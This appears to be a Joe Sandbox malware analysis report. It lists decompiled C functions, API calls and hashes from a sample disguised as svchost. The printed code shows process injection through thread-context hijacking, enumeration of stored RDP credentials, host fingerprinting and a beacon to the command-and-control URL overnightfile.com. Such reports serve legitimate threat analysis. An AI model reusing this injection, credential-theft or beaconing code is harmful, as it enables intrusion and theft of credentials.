                                                                                                                                        0x02442e4b
                                                                                                                                        0x02442e52
                                                                                                                                        0x02442e58
                                                                                                                                        0x02442e5e
                                                                                                                                        0x02442e5e
                                                                                                                                        0x02442e52
                                                                                                                                        0x02442e65
                                                                                                                                        0x02442e6d
                                                                                                                                        0x02442e6d
                                                                                                                                        0x02442e77
                                                                                                                                        0x02442e81
                                                                                                                                        0x00000000
                                                                                                                                        0x02442e87
                                                                                                                                        0x00000000
                                                                                                                                        0x02442df8
                                                                                                                                        0x00000000

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cc8d4e2b65f786519aaaa83a23ffa49c6b3ac7eb85c33867c8e66b500b3cc0f9
                                                                                                                                        • Instruction ID: a2a51676a37116bd1469164a662a13a7978e2d21c4e7fd8f433392ab06ae953b
                                                                                                                                        • Opcode Fuzzy Hash: cc8d4e2b65f786519aaaa83a23ffa49c6b3ac7eb85c33867c8e66b500b3cc0f9
                                                                                                                                        • Instruction Fuzzy Hash: EF2151B5D00209EBDB04DFE4D944AEFB7B8AF48310F208659F915A7240EB70A744CFA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        Function 024431A0, Relevance: 6.1, APIs: 4, Instructions: 58stringUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                        			E024431A0(long _a4, CHAR* _a8) {
				int _v8;
				CHAR* _v12;
				void* _v16;
				void* _v20;
				char _v280;
				void* _t29;
				void* _t48;

				_t29 = OpenProcess(0x400, 0, _a4);
				_v16 = _t29;
				if(_v16 == 0) {
					L12:
					return 0;
				}
				_push(0x104);
				_push( &_v280);
				_push(_v16); // executed
				L02443D3A(); // executed
				_v20 = _t29;
				FindCloseChangeNotification(_v16); // executed
				if(_v20 <= 0) {
					goto L12;
				}
				_v12 = 0;
				_v8 = 0;
				while(_v8 < _v20) {
					if( *((char*)(_t48 + _v8 - 0x114)) == 0x5c) {
						_v12 = _t48 + _v8 - 0x113;
					}
					if( *((char*)(_t48 + _v8 - 0x114)) != 0) {
						_v8 = _v8 + 1;
						continue;
					} else {
						break;
					}
				}
				if(_v12 == 0) {
					goto L12;
				}
				lstrcpyA(_a8, _v12);
				return 1;
			}










                                                                                                                                        0x024431b4
                                                                                                                                        0x024431ba
                                                                                                                                        0x024431c1
                                                                                                                                        0x0244325b
                                                                                                                                        0x00000000
                                                                                                                                        0x0244325b
                                                                                                                                        0x024431c7
                                                                                                                                        0x024431d2
                                                                                                                                        0x024431d6
                                                                                                                                        0x024431d7
                                                                                                                                        0x024431dc
                                                                                                                                        0x024431e3
                                                                                                                                        0x024431ed
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x024431ef
                                                                                                                                        0x024431f6
                                                                                                                                        0x02443208
                                                                                                                                        0x0244321e
                                                                                                                                        0x0244322a
                                                                                                                                        0x0244322a
                                                                                                                                        0x0244323a
                                                                                                                                        0x02443205
                                                                                                                                        0x00000000
                                                                                                                                        0x0244323c
                                                                                                                                        0x00000000
                                                                                                                                        0x0244323c
                                                                                                                                        0x0244323a
                                                                                                                                        0x02443244
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0244324e
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,02443080), ref: 024431B4
                                                                                                                                        • GetProcessImageFileNameA.PSAPI(00000000,?,00000104), ref: 024431D7
                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,00000104), ref: 024431E3
                                                                                                                                        • lstrcpyA.KERNEL32(00000000,00000000), ref: 0244324E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$ChangeCloseFileFindImageNameNotificationOpenlstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1999166229-0
                                                                                                                                        • Opcode ID: 7cf3abe1340666a38ad99f4d1f761fa24ef76571de8dd88360cdb7425ffcab71
                                                                                                                                        • Instruction ID: 41b30540de512fbaea09711873584034e6784f9ceecbac471586ce98c1150501
                                                                                                                                        • Opcode Fuzzy Hash: 7cf3abe1340666a38ad99f4d1f761fa24ef76571de8dd88360cdb7425ffcab71
                                                                                                                                        • Instruction Fuzzy Hash: 99214D74E0014CEBEB14CF94D585BEEBBB5BB44B04F2085DAEA15AB280CB745B85CF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 02443A60, Relevance: 6.1, APIs: 4, Instructions: 51threadinjectionUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02443A60(void* _a4, void* _a8, void _a12, intOrPtr _a16) {
				struct _CONTEXT _v720;
				int _t15;
				int _t17;
				int _t19;

				_v720.ContextFlags = 0x10002;
				E024414A0( &(_v720.Dr0), 0, 0x2c8);
				_t15 = GetThreadContext(_a8,  &_v720); // executed
				if(_t15 != 0) {
					_t17 = WriteProcessMemory(_a4, _v720.Ebx + 8,  &_a12, 4, 0); // executed
					if(_t17 != 0) {
						_v720.Eax = _a16;
						_t19 = SetThreadContext(_a8,  &_v720); // executed
						if(_t19 != 0) {
							ResumeThread(_a8); // executed
							return 1;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}







                                                                                                                                        0x02443a69
                                                                                                                                        0x02443a81
                                                                                                                                        0x02443a94
                                                                                                                                        0x02443a9c
                                                                                                                                        0x02443ab8
                                                                                                                                        0x02443ac0
                                                                                                                                        0x02443ac9
                                                                                                                                        0x02443ada
                                                                                                                                        0x02443ae2
                                                                                                                                        0x02443aec
                                                                                                                                        0x00000000
                                                                                                                                        0x02443af2
                                                                                                                                        0x00000000
                                                                                                                                        0x02443ae4
                                                                                                                                        0x00000000
                                                                                                                                        0x02443ac2
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • GetThreadContext.KERNEL32(?,00010002), ref: 02443A94
                                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00500000,00000004,00000000), ref: 02443AB8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ContextMemoryProcessThreadWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2099319263-0
                                                                                                                                        • Opcode ID: bd1b2748c2d636373e780d084f89d7bbbff0d0b11447c133568ae75fd16d9d98
                                                                                                                                        • Instruction ID: 67ff93512eb5d2bbb0dde1a833d1961fdbbed7a9031b7051f6e2c88eb821940d
                                                                                                                                        • Opcode Fuzzy Hash: bd1b2748c2d636373e780d084f89d7bbbff0d0b11447c133568ae75fd16d9d98
                                                                                                                                        • Instruction Fuzzy Hash: C911A575A85109ABEB14CF64DC49FAF37A8AB08B44F108596FA0DE6240EB74E560CF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 1000124C, Relevance: 6.0, APIs: 4, Instructions: 40fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000124C() {
				void* _t12;
				void* _t13;
				int _t16;
				void* _t24;
				void* _t25;
				void* _t26;

				_t12 = CreateFileA( *(_t26 + 8), 0x80000000, 3, 0, 3, 0, 0); // executed
				 *(_t26 - 4) = _t12;
				_t13 = _t12 + 1;
				if(_t13 != 0) {
					while(1) {
						_t16 = ReadFile( *(_t26 - 4), _t26 - 0x1008, 0x1000, _t26 - 8, 0); // executed
						if(_t16 == 0) {
							break;
						}
						E100011AA(_t26 - 0x1008, _t24, _t25,  *((intOrPtr*)(_t26 + 0xc)), _t26 - 0x1008,  *(_t26 - 8)); // executed
						if( *(_t26 - 8) != 0) {
							continue;
						} else {
							CloseHandle( *(_t26 - 4));
							return 1;
						}
						goto L6;
					}
					CloseHandle( *(_t26 - 4));
					return 0;
				} else {
					return _t13;
				}
				L6:
			}









                                                                                                                                        0x1000125e
                                                                                                                                        0x10001263
                                                                                                                                        0x10001266
                                                                                                                                        0x10001267
                                                                                                                                        0x1000126d
                                                                                                                                        0x10001282
                                                                                                                                        0x10001289
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x100012a6
                                                                                                                                        0x100012af
                                                                                                                                        0x00000000
                                                                                                                                        0x100012b1
                                                                                                                                        0x100012b4
                                                                                                                                        0x100012bf
                                                                                                                                        0x100012bf
                                                                                                                                        0x00000000
                                                                                                                                        0x100012af
                                                                                                                                        0x1000128e
                                                                                                                                        0x10001296
                                                                                                                                        0x10001269
                                                                                                                                        0x1000126a
                                                                                                                                        0x1000126a
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 1000125E
                                                                                                                                        • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10001282
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 1000128E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseCreateHandleRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1035965006-0
                                                                                                                                        • Opcode ID: bfff0d5d86f8a951dd4e9188aa5afa9311fd4997f04a5bf91ceee8a02c3fa9dc
                                                                                                                                        • Instruction ID: d891eaf70732835da4134534b8ba5287ba3f19d9ced1e028663f9beb8a2a542a
                                                                                                                                        • Opcode Fuzzy Hash: bfff0d5d86f8a951dd4e9188aa5afa9311fd4997f04a5bf91ceee8a02c3fa9dc
                                                                                                                                        • Instruction Fuzzy Hash: 06F0EC35A4054DB9FB11DE90DC02FDDBAA8EB14789F104061B244F50D9D6B1ABA4EB10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.35%

                                                                                                                                        Function 10009C4D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 16%
                                                                                                                                        			E10009C4D(intOrPtr _a4) {
				void* _v8;
				char _v12;
				void* _t17;
				void* _t20;
				intOrPtr* _t23;
				void* _t25;

				if( *0x1000f4bc != 0 &&  *0x1000f4b8 != 0 &&  *0x1000f4f4 != 0) {
					_v8 = 0;
					_v12 = 0;
					_t20 =  *0x1000f4b8("TERMSRV/*", 0,  &_v12,  &_v8); // executed
					_t17 = _t20;
					if(_t17 != 0 && _v12 != 0 && _v8 != 0) {
						_t23 = _v8;
						while(_v12 != 0 &&  *_t23 != 0) {
							E10009B9C(__eflags, _a4,  *((intOrPtr*)( *_t23 + 0x30)),  *((intOrPtr*)( *_t23 + 8)),  *((intOrPtr*)(_t24 + 0x1c)),  *((intOrPtr*)(_t24 + 0x18)));
							_t25 = _t23;
							_v12 = _v12 - 1;
							_t23 = _t25 + 4;
							__eflags = _t23;
						}
						return  *0x1000f4bc(_v8);
					}
				}
				return _t17;
			}









                                                                                                                                        0x10009c5b
                                                                                                                                        0x10009c6f
                                                                                                                                        0x10009c76
                                                                                                                                        0x10009c8c
                                                                                                                                        0x10009c92
                                                                                                                                        0x10009c94
                                                                                                                                        0x10009ca2
                                                                                                                                        0x10009cc5
                                                                                                                                        0x10009cb9
                                                                                                                                        0x10009cbe
                                                                                                                                        0x10009cbf
                                                                                                                                        0x10009cc2
                                                                                                                                        0x10009cc2
                                                                                                                                        0x10009cc2
                                                                                                                                        0x00000000
                                                                                                                                        0x10009cd3
                                                                                                                                        0x10009c94
                                                                                                                                        0x10009cdb

                                                                                                                                        APIs
                                                                                                                                        • CredEnumerateA.SECHOST(TERMSRV/*,00000000,00000000,00000000), ref: 10009C8C
                                                                                                                                        • CredFree.ADVAPI32(00000000), ref: 10009CD3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cred$EnumerateFree
                                                                                                                                        • String ID: TERMSRV/*
                                                                                                                                        • API String ID: 3403564193-275249402
                                                                                                                                        • Opcode ID: 2c7132e0befa47dbd424e3ba334f0794f9b22ce08d7012935d5c15db61ddc90e
                                                                                                                                        • Instruction ID: f2bcace94667ccc7cf485fa1688972958c13b9acfb2390048d65b055f40299d6
                                                                                                                                        • Opcode Fuzzy Hash: 2c7132e0befa47dbd424e3ba334f0794f9b22ce08d7012935d5c15db61ddc90e
                                                                                                                                        • Instruction Fuzzy Hash: FC115E32C02218EBFF61CF80CD44BDABBF4EB00384F11416AE543624A9D375AAC4EB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.28%

                                                                                                                                        Function 02441770, Relevance: 4.6, APIs: 3, Instructions: 98COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                        			E02441770(void* __eflags) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				signed int _v28;
				long _v32;
				int _v36;
				long _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v312;
				intOrPtr _t45;
				intOrPtr _t46;
				int _t55;
				signed int _t74;
				void* _t82;
				void* _t83;
				void* _t84;

				asm("xorpd xmm0, xmm0");
				asm("movlpd [ebp-0xc], xmm0");
				asm("xorpd xmm0, xmm0");
				asm("movlpd [ebp-0x1c], xmm0");
				_v24 = 0x4000;
				_t45 = E02441390(_v24);
				_t84 = _t83 + 4;
				_v20 = _t45;
				_v8 = _v20;
				_push( &_v24);
				_t46 = _v8;
				_push(_t46);
				_push(0);
				_push(0);
				_push(2); // executed
				L02443D2E(); // executed
				_v52 = _t46;
				if(_v52 != 0) {
					L3:
					E024413D0(_v20);
					_v36 = GetWindowsDirectoryA( &_v312, 0x104);
					if(_v36 > 0) {
						 *((char*)(_t82 + 0xfffffffffffffecf)) = 0;
						_t55 = GetVolumeInformationA( &_v312, 0, 0,  &_v40, 0, 0, 0, 0); // executed
						if(_t55 != 0) {
							_v32 = _v40;
							_v28 = 0;
						}
					}
					_t74 = _v28;
					_v16 = E02441400(_v32, 0x20, _t74) ^ _v16;
					_v12 = _t74 ^ _v12;
					return _v16;
				}
				while(_v8 != 0) {
					E024414A0( &_v48, 0, 8);
					E02441450( &_v48, _v8 + 0x2c,  *((intOrPtr*)(_v8 + 0x34)));
					_t84 = _t84 + 0x18;
					_v16 = _v16 ^ _v48;
					_v12 = _v12 ^ _v44;
					_v8 =  *((intOrPtr*)(_v8 + 8));
				}
				goto L3;
			}























                                                                                                                                        0x02441779
                                                                                                                                        0x0244177d
                                                                                                                                        0x02441782
                                                                                                                                        0x02441786
                                                                                                                                        0x0244178b
                                                                                                                                        0x02441796
                                                                                                                                        0x0244179b
                                                                                                                                        0x0244179e
                                                                                                                                        0x024417a4
                                                                                                                                        0x024417aa
                                                                                                                                        0x024417ab
                                                                                                                                        0x024417ae
                                                                                                                                        0x024417af
                                                                                                                                        0x024417b1
                                                                                                                                        0x024417b3
                                                                                                                                        0x024417b5
                                                                                                                                        0x024417ba
                                                                                                                                        0x024417c1
                                                                                                                                        0x02441810
                                                                                                                                        0x02441814
                                                                                                                                        0x0244182e
                                                                                                                                        0x02441835
                                                                                                                                        0x0244183f
                                                                                                                                        0x0244185e
                                                                                                                                        0x02441866
                                                                                                                                        0x0244186d
                                                                                                                                        0x02441870
                                                                                                                                        0x02441870
                                                                                                                                        0x02441866
                                                                                                                                        0x02441876
                                                                                                                                        0x02441886
                                                                                                                                        0x02441889
                                                                                                                                        0x02441895
                                                                                                                                        0x02441895
                                                                                                                                        0x024417c3
                                                                                                                                        0x024417d1
                                                                                                                                        0x024417eb
                                                                                                                                        0x024417f0
                                                                                                                                        0x024417ff
                                                                                                                                        0x02441802
                                                                                                                                        0x0244180b
                                                                                                                                        0x0244180b
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02441390: GetProcessHeap.KERNEL32(?,02442516,00080000), ref: 0244139C
                                                                                                                                          • Part of subcall function 02441390: RtlAllocateHeap.NTDLL(02140000,00000000,02442516,?,02442516,00080000), ref: 024413BD
                                                                                                                                        • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,0244159B,00004000), ref: 024417B5
                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02441828
                                                                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0244185E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AdaptersAddressesAllocateDirectoryInformationProcessVolumeWindows
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3351004863-0
                                                                                                                                        • Opcode ID: d44b96bc2648ed391fcc60b98b878f83b12ea3426167ef4789c3e63441c3020f
                                                                                                                                        • Instruction ID: 87ea084e04d181d6e738f5407fda6d38fbcd4e1bed013aff11b5dec1004317e2
                                                                                                                                        • Opcode Fuzzy Hash: d44b96bc2648ed391fcc60b98b878f83b12ea3426167ef4789c3e63441c3020f
                                                                                                                                        • Instruction Fuzzy Hash: 8A414EB4D00208ABEB14DFE5D981BEEF7B5BF48704F10855AE519B7280E770AA84CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.78%

                                                                                                                                        Function 1000B362, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000B362(void* __ecx, void* __edx, void* __eflags) {
				void* _t26;
				void* _t32;
				void* _t34;
				void* _t37;
				char* _t43;
				void* _t44;

				_t41 = __edx;
				_t40 = __ecx;
				_t37 = 0;
				E10003FF3();
				 *((intOrPtr*)(_t44 - 0x14)) = 0;
				_t26 = E10001000(_t44 - 0x14, __ecx, __edx, _t44 - 0x14);
				if( *((intOrPtr*)(_t44 - 0x14)) == 0) {
					_t26 = E10001000(_t44 - 0x14, __ecx, __edx, _t44 - 0x14);
					if( *((intOrPtr*)(_t44 - 0x14)) == 0) {
						_t26 = E10001000(_t44 - 0x14, __ecx, __edx, _t44 - 0x14);
					}
				}
				if( *((intOrPtr*)(_t44 - 0x14)) == 0) {
					L23:
					E10001026(_t26, _t37, _t40, _t41,  *((intOrPtr*)(_t44 - 0x14)));
					return _t37;
				}
				_t26 = E1000B304(_t44 - 0x10, _t41,  *((intOrPtr*)(_t44 - 0x14)), _t44 - 0x10); // executed
				if(_t26 != 1) {
					goto L23;
				}
				_t43 = "http://overnightfile.com/mlu/forum.php";
				while( *_t43 != 0) {
					_t37 = _t37;
					if(_t37 == 0) {
						 *((intOrPtr*)(_t44 - 0x1c)) = 0xa;
						while(1) {
							 *((intOrPtr*)(_t44 - 0x18)) = 0;
							_t32 = E10003F8F(_t43,  *((intOrPtr*)(_t44 - 0x14)), _t44 - 0x18); // executed
							_t33 = _t32;
							if(_t32 != 0 &&  *((intOrPtr*)(_t44 - 0x18)) != 0) {
								_t37 = _t33;
								if(_t37 == 0) {
									_t34 = E10001B79(_t40, _t41,  *((intOrPtr*)(_t44 - 0x18)));
									_t33 = _t34;
									if(_t34 != 0) {
										_t37 = _t33;
									}
								}
							}
							_t26 = E10001026(_t33, _t37, _t40, _t41,  *((intOrPtr*)(_t44 - 0x18)));
							_t37 = _t37;
							if(_t37 != 0 ||  *((intOrPtr*)(_t44 - 0x1c)) == 0) {
								break;
							}
							 *((intOrPtr*)(_t44 - 0x1c)) =  *((intOrPtr*)(_t44 - 0x1c)) - 1;
							Sleep(0x1388);
						}
						while( *_t43 != 0) {
							_t43 =  &(_t43[1]);
						}
						_t43 =  &(_t43[1]);
						continue;
					}
					break;
				}
				_t37 = _t37;
				if(_t37 != 0) {
					_t26 = E100026B6("Client Hash", _t44 - 0x10, 0x10); // executed
				}
				goto L23;
			}









                                                                                                                                        0x1000b362
                                                                                                                                        0x1000b362
                                                                                                                                        0x1000b362
                                                                                                                                        0x1000b364
                                                                                                                                        0x1000b369
                                                                                                                                        0x1000b374
                                                                                                                                        0x1000b37d
                                                                                                                                        0x1000b383
                                                                                                                                        0x1000b38c
                                                                                                                                        0x1000b392
                                                                                                                                        0x1000b392
                                                                                                                                        0x1000b38c
                                                                                                                                        0x1000b39b
                                                                                                                                        0x1000b44d
                                                                                                                                        0x1000b450
                                                                                                                                        0x1000b45a
                                                                                                                                        0x1000b45a
                                                                                                                                        0x1000b3a8
                                                                                                                                        0x1000b3b0
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000b3b6
                                                                                                                                        0x1000b430
                                                                                                                                        0x1000b435
                                                                                                                                        0x1000b437
                                                                                                                                        0x1000b3bd
                                                                                                                                        0x1000b3c4
                                                                                                                                        0x1000b3c4
                                                                                                                                        0x1000b3d3
                                                                                                                                        0x1000b3d8
                                                                                                                                        0x1000b3da
                                                                                                                                        0x1000b3ec
                                                                                                                                        0x1000b3ee
                                                                                                                                        0x1000b3f3
                                                                                                                                        0x1000b3f8
                                                                                                                                        0x1000b3fa
                                                                                                                                        0x1000b404
                                                                                                                                        0x1000b404
                                                                                                                                        0x1000b3fa
                                                                                                                                        0x1000b3ee
                                                                                                                                        0x1000b409
                                                                                                                                        0x1000b40e
                                                                                                                                        0x1000b410
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000b418
                                                                                                                                        0x1000b420
                                                                                                                                        0x1000b420
                                                                                                                                        0x1000b42a
                                                                                                                                        0x1000b429
                                                                                                                                        0x1000b429
                                                                                                                                        0x1000b42f
                                                                                                                                        0x00000000
                                                                                                                                        0x1000b42f
                                                                                                                                        0x00000000
                                                                                                                                        0x1000b437
                                                                                                                                        0x1000b439
                                                                                                                                        0x1000b43b
                                                                                                                                        0x1000b448
                                                                                                                                        0x1000b448
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10003FF3: WSAStartup.WSOCK32(00000101,?), ref: 10004008
                                                                                                                                        • Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 1000B420
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SleepStartup
                                                                                                                                        • String ID: Client Hash$http://overnightfile.com/mlu/forum.php
                                                                                                                                        • API String ID: 1372284471-3973395219
                                                                                                                                        • Opcode ID: a7ca72562b2103df3478d186f753745b639680fd847caa769ff02d0a74380b96
                                                                                                                                        • Instruction ID: ec1c494170b3bdf541c5c1bca8b9a19162536f1f75bd8be2548ab85bfa117b48
                                                                                                                                        • Opcode Fuzzy Hash: a7ca72562b2103df3478d186f753745b639680fd847caa769ff02d0a74380b96
                                                                                                                                        • Instruction Fuzzy Hash: 9E212C75D10A4A9AFB01DFE0C882BFEB6B8EB002C4F610035E211A109AD7B95F959752
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 1000A942, Relevance: 4.6, APIs: 3, Instructions: 51registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000A942(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, CHAR* _a16, intOrPtr _a20) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				long _t23;
				long _t24;
				void* _t36;

				_t36 = __ecx;
				_t23 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t24 = _t23;
				if(_t24 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E10001E05(E10001E05(E10001DB1(_a12, "\\"),  &_v2064), _a16);
						E1000A89E(_t36, _a4, _a8, _v2068, _a20);
						E10001871(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t24;
			}











                                                                                                                                        0x1000a942
                                                                                                                                        0x1000a955
                                                                                                                                        0x1000a95a
                                                                                                                                        0x1000a95c
                                                                                                                                        0x1000a962
                                                                                                                                        0x1000a969
                                                                                                                                        0x1000a969
                                                                                                                                        0x1000a990
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a9b9
                                                                                                                                        0x1000a9ce
                                                                                                                                        0x1000a9d9
                                                                                                                                        0x1000a9de
                                                                                                                                        0x1000a9de
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a9e6
                                                                                                                                        0x1000a9ec

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 1000A955
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 1000A989
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 1000A9E6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1332880857-0
                                                                                                                                        • Opcode ID: bbcac006ee9b77f9a3eb43a3cf1abb72e523c1938f8e660535b5ed4e1fc8cfce
                                                                                                                                        • Instruction ID: 7deeaf799962a3a313d9e1532e5d966a8d03a1267d08ef4192bfa8d41fecf357
                                                                                                                                        • Opcode Fuzzy Hash: bbcac006ee9b77f9a3eb43a3cf1abb72e523c1938f8e660535b5ed4e1fc8cfce
                                                                                                                                        • Instruction Fuzzy Hash: 1F11007590010DBAEF12DF90CC42FDE7BB9FF05380F1081A1B91465066DB75AB91AF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.03%

                                                                                                                                        Function 1000391D, Relevance: 4.6, APIs: 3, Instructions: 50networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                        			E1000391D(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, short _a12) {
				intOrPtr _v16;
				short _v18;
				char _v20;
				void* _t15;
				intOrPtr _t16;
				char* _t17;
				void* _t19;

				_t19 = 0;
				_push(6);
				_push(1);
				_push(2); // executed
				L1000B8DE(); // executed
				if(__eax != 0xffffffff) {
					_t19 = __eax;
					_t15 = E1000189F( &_v20, 0x10);
					_v20 = 2;
					_v18 = _a12;
					if(_a8 == 0) {
						if(_a8 != 0 || _a4 != 0) {
							_t16 = E100038E3(_t15, _a4); // executed
							if(_t16 != 0xffffffff) {
								goto L9;
							} else {
								goto L10;
							}
						} else {
							goto L10;
						}
					} else {
						_t16 = _a8;
						L9:
						_v16 = _t16;
						_push(0x10);
						_t17 =  &_v20;
						_push(_t17);
						_push(_t19); // executed
						L1000B8E4(); // executed
						if(_t17 == 0xffffffff) {
							L10:
							_push(_t19);
							L1000B8EA();
							_t19 = 0;
						}
					}
				} else {
				}
				return _t19;
			}










                                                                                                                                        0x10003924
                                                                                                                                        0x10003926
                                                                                                                                        0x10003928
                                                                                                                                        0x1000392a
                                                                                                                                        0x1000392c
                                                                                                                                        0x10003934
                                                                                                                                        0x10003938
                                                                                                                                        0x10003940
                                                                                                                                        0x10003945
                                                                                                                                        0x10003950
